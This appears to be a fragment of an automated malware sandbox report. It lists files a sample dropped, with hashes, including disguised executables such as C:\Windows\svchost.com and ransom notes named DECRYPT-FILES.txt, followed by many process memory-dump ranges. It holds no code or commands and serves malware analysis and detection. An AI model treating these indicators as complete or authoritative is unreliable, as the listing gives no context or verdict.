                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        55B

                                                                                                                                        MD5

                                                                                                                                        20668363bcb9fb475e02c5ccdcb8bba6

                                                                                                                                        SHA1

                                                                                                                                        8f6485818ef4157518a919d68074ac713816e0d7

                                                                                                                                        SHA256

                                                                                                                                        835951b1bcf2e40c33fc12d0917f2448ffbb0a328269d5de3deffcdbe4136a1a

                                                                                                                                        SHA512

                                                                                                                                        1af781f17d49e9fc80d666b3466bdcf34e13d12fae7f6f6fe4ceff4ccfd26020f46d69301aeb02b4b755ed9ac86cde5de48dafcae49b3dae9bf0d7623d1ecb07

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        86B

                                                                                                                                        MD5

                                                                                                                                        f885d87964363b63dd02fa0764914e34

                                                                                                                                        SHA1

                                                                                                                                        f4040260ce0513af83c51129835e39fc1dc5b8cd

                                                                                                                                        SHA256

                                                                                                                                        6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f

                                                                                                                                        SHA512

                                                                                                                                        054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

                                                                                                                                      • C:\Windows\svchost.com

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                        MD5

                                                                                                                                        437a6ecbf6db08034276cea58075b0b0

                                                                                                                                        SHA1

                                                                                                                                        4d90c0b3de4448d364d25676869e75aa2971f5b7

                                                                                                                                        SHA256

                                                                                                                                        15c6723f03081ac3f9a26c2f047460b326808fe46c749d02cc5486b38b6ad50d

                                                                                                                                        SHA512

                                                                                                                                        0169029b660d9f47c466229c61d6c29a0531f984ce576b89522337b31c4abafb2083a71b7709b4550b0e007f53d5fd1ac21e8c4b14a9d27ec991b7637da27e4c

                                                                                                                                      • C:\Windows\syslyqdvr.exe

                                                                                                                                        Filesize

                                                                                                                                        95KB

                                                                                                                                        MD5

                                                                                                                                        f9d5d8b4fbeffbffead34ea87da2d1c9

                                                                                                                                        SHA1

                                                                                                                                        d8db7444944e63a485cbb2f1acc86c01cc40150b

                                                                                                                                        SHA256

                                                                                                                                        dc69f2b947673cdb4775a4ae081e009f6a713a35000e43e5fa86d5eabe99a7e4

                                                                                                                                        SHA512

                                                                                                                                        38ddd39867a0d437e847c29469f3599c7c2f0ca61efebbfbae6d3898e130dd33e57ee2c036847ac0f9e3b1a3fd463d409f7ed3b3f6edeb8202cd10f705079723

                                                                                                                                      • F:\$RECYCLE.BIN\DECRYPT-FILES.txt

                                                                                                                                        Filesize

                                                                                                                                        10KB

                                                                                                                                        MD5

                                                                                                                                        3556532d8ce28a7964430ad1caa3f4af

                                                                                                                                        SHA1

                                                                                                                                        6456a26a2ceda359ffaf7179e0fbbcb6f77ae863

                                                                                                                                        SHA256

                                                                                                                                        ebba92f8991156a22a74badbb0de80d7baad356e3b9a4ca0dc8b21de37b143cd

                                                                                                                                        SHA512

                                                                                                                                        5f80f1049505924fcdc777a2830720cc0b774f93cfa1da788cfa06fe5a6f136993129f7e5ad96c1c4a75aa827654bea553ddc8086a05ec9e9d23dfe27b30c5d3

                                                                                                                                      • F:\DECRYPT-FILES.txt

                                                                                                                                        Filesize

                                                                                                                                        10KB

                                                                                                                                        MD5

                                                                                                                                        d3cd03f917787225de6a63cf8634d62c

                                                                                                                                        SHA1

                                                                                                                                        e75b52240018db28e595b7d8332b4f47136c9038

                                                                                                                                        SHA256

                                                                                                                                        c73b7651be05468ce71ce4ecbc1babfd83b9cdd38836e82a90734822f5f09ce9

                                                                                                                                        SHA512

                                                                                                                                        769cae9741dc12efa2169cc501fdd9e856e894850c3407f2d8fb5855648c207e5445f3af468aac94595ca39ea29ce8ec4ecb509e417413381a664522e571ce36

                                                                                                                                      • memory/220-107-0x0000000000400000-0x00000000004CC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        816KB

                                                                                                                                      • memory/220-1021-0x0000000000400000-0x00000000004CC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        816KB

                                                                                                                                      • memory/224-1051-0x0000000000400000-0x0000000000705000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.0MB

                                                                                                                                      • memory/668-1198-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        184KB

                                                                                                                                      • memory/668-1234-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        184KB

                                                                                                                                      • memory/668-1211-0x0000000001F00000-0x0000000001F01000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/840-94-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/840-264-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/840-700-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/840-265-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/840-270-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/1404-1022-0x0000000000400000-0x000000000068E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.6MB

                                                                                                                                      • memory/1520-4784-0x0000000005540000-0x0000000005702000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.8MB

                                                                                                                                      • memory/1520-4785-0x00000000053F0000-0x0000000005440000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        320KB

                                                                                                                                      • memory/1520-4783-0x0000000000930000-0x00000000009F6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        792KB

                                                                                                                                      • memory/1728-1513-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/1876-2055-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/2272-1495-0x0000000002B70000-0x0000000002B7C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        48KB

                                                                                                                                      • memory/2272-1454-0x0000000001380000-0x000000000138C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        48KB

                                                                                                                                      • memory/2272-1494-0x0000000002B50000-0x0000000002B5C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        48KB

                                                                                                                                      • memory/2272-1361-0x0000000000B50000-0x0000000000BE4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        592KB

                                                                                                                                      • memory/2272-1493-0x0000000001390000-0x000000000139A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/2288-4847-0x0000000000150000-0x000000000015C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        48KB

                                                                                                                                      • memory/2964-4446-0x0000000007C40000-0x0000000007C51000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        68KB

                                                                                                                                      • memory/2964-4435-0x000000006D410000-0x000000006D45C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        304KB

                                                                                                                                      • memory/2964-4423-0x0000000006030000-0x0000000006384000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.3MB

                                                                                                                                      • memory/2964-4460-0x0000000007C80000-0x0000000007C94000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        80KB

                                                                                                                                      • memory/2964-4445-0x00000000078C0000-0x0000000007963000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        652KB

                                                                                                                                      • memory/3304-698-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/3304-2091-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/3460-2030-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/3916-84-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/4112-1235-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/4300-1503-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/4368-104-0x0000000004930000-0x00000000049CC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        624KB

                                                                                                                                      • memory/4368-96-0x0000000000050000-0x0000000000058000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/4760-701-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        864KB

                                                                                                                                      • memory/4760-91-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        864KB

                                                                                                                                      • memory/4884-564-0x00000000066C0000-0x00000000066DE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        120KB

                                                                                                                                      • memory/4884-594-0x0000000006930000-0x000000000696C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        240KB

                                                                                                                                      • memory/4884-392-0x0000000005770000-0x0000000005D14000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        5.6MB

                                                                                                                                      • memory/4884-391-0x00000000008B0000-0x0000000000902000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        328KB

                                                                                                                                      • memory/4884-588-0x0000000006990000-0x0000000006A9A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.0MB

                                                                                                                                      • memory/4884-568-0x0000000006E40000-0x0000000007458000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.1MB

                                                                                                                                      • memory/4884-400-0x0000000005190000-0x000000000519A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/4884-487-0x0000000005DA0000-0x0000000005E16000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        472KB

                                                                                                                                      • memory/4884-640-0x0000000006AA0000-0x0000000006AEC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        304KB

                                                                                                                                      • memory/4884-589-0x00000000068D0000-0x00000000068E2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        72KB

                                                                                                                                      • memory/4884-399-0x0000000005260000-0x00000000052F2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        584KB

                                                                                                                                      • memory/5016-4801-0x0000000000820000-0x000000000083E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        120KB

                                                                                                                                      • memory/5144-1023-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        188KB

                                                                                                                                      • memory/5144-1655-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        188KB

                                                                                                                                      • memory/5272-1777-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/5312-1067-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        244KB

                                                                                                                                      • memory/5336-4728-0x0000000000820000-0x0000000000A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/5696-4205-0x0000000007910000-0x0000000007921000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        68KB

                                                                                                                                      • memory/5696-4181-0x0000000007D90000-0x000000000840A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.5MB

                                                                                                                                      • memory/5696-4215-0x0000000007A30000-0x0000000007A4A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        104KB

                                                                                                                                      • memory/5696-4214-0x0000000007940000-0x0000000007954000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        80KB

                                                                                                                                      • memory/5696-4212-0x0000000007930000-0x000000000793E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        56KB

                                                                                                                                      • memory/5696-3391-0x0000000005610000-0x0000000005C38000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.2MB

                                                                                                                                      • memory/5696-4189-0x0000000007970000-0x0000000007A06000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        600KB

                                                                                                                                      • memory/5696-3750-0x00000000063B0000-0x00000000063CE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        120KB

                                                                                                                                      • memory/5696-4186-0x0000000007760000-0x000000000776A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/5696-4216-0x0000000007A10000-0x0000000007A18000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/5696-4182-0x0000000007710000-0x000000000772A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        104KB

                                                                                                                                      • memory/5696-3367-0x0000000004E40000-0x0000000004E76000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        216KB

                                                                                                                                      • memory/5696-4180-0x00000000075B0000-0x0000000007653000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        652KB

                                                                                                                                      • memory/5696-4179-0x0000000006970000-0x000000000698E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        120KB

                                                                                                                                      • memory/5696-3697-0x0000000005D70000-0x0000000005D92000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/5696-4168-0x0000000007370000-0x00000000073A2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        200KB

                                                                                                                                      • memory/5696-3701-0x0000000005F10000-0x0000000006264000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.3MB

                                                                                                                                      • memory/5696-3698-0x0000000005E10000-0x0000000005E76000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        408KB

                                                                                                                                      • memory/5696-3699-0x0000000005EA0000-0x0000000005F06000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        408KB

                                                                                                                                      • memory/5696-4169-0x000000006D410000-0x000000006D45C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        304KB

                                                                                                                                      • memory/5716-1227-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5716-1229-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5716-1283-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5716-1228-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5716-1245-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5756-1366-0x00000000005F0000-0x000000000064E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        376KB

                                                                                                                                      • memory/5756-1362-0x00000000005F0000-0x000000000064E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        376KB

                                                                                                                                      • memory/5756-1643-0x00000000005F0000-0x000000000064E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        376KB

                                                                                                                                      • memory/5788-1147-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        184KB

                                                                                                                                      • memory/5788-1083-0x0000000000550000-0x0000000000551000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/5808-1151-0x00000000005A0000-0x00000000005A1000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/5808-1149-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        244KB

                                                                                                                                      • memory/5872-1898-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        88KB

                                                                                                                                      • memory/5872-1150-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        88KB

                                                                                                                                      • memory/5968-1498-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/5976-1994-0x00007FFCA3240000-0x00007FFCA3250000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5976-1633-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5976-1632-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5976-1605-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5976-1641-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5976-1906-0x00007FFCA3240000-0x00007FFCA3250000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/5976-1631-0x00007FFCA5830000-0x00007FFCA5840000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/6096-1642-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        108KB

                                                                                                                                      • memory/6340-3147-0x0000014AF8060000-0x0000014AF8082000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/6912-4298-0x0000000000CD0000-0x0000000000CF4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        144KB

                                                                                                                                      • memory/7224-4332-0x0000000005CD0000-0x0000000005DF2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.1MB

                                                                                                                                      • memory/7224-4323-0x0000000000F70000-0x00000000011B4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.3MB

                                                                                                                                      • memory/7224-4330-0x0000000005BB0000-0x0000000005CD0000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.1MB

                                                                                                                                      • memory/7224-4333-0x00000000033F0000-0x000000000340C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        112KB

                                                                                                                                      • memory/7236-4302-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/7548-4848-0x00000000057C0000-0x0000000005B14000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.3MB

                                                                                                                                      • memory/7548-4858-0x000000006D410000-0x000000006D45C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        304KB

                                                                                                                                      • memory/7548-4868-0x0000000007010000-0x00000000070B3000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        652KB

                                                                                                                                      • memory/7548-4869-0x0000000007340000-0x0000000007351000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        68KB

                                                                                                                                      • memory/7548-4872-0x0000000007390000-0x00000000073A4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        80KB